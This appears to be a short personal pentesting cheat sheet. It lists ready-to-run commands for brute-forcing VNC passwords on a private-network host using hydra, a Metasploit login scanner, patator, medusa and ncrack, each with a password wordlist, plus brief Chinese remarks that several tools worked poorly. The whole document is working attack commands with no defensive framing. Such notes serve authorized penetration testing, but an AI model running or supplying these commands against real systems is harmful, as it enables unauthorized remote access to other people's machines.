- hydra
hydra -s 5900 –P /root/Pentest/pass.txt –t 16 192.168.127.235 vnc
xhydra
metasploit
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.127.235
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Pentest/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
- patator
patator vnc_login host=192.168.127.235 password=FILE0 0=/root/Pentest/ruokouling/changyong/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0 效果不是太好
- medusa
medusa -h 192.168.127.235 -u root -P pass.txt -M vnc 这里的root是随便指定,效果不是太好
- ncrack
ncrack -v --user root -P pass.txt 192.168.127.235:5900 效果不是太好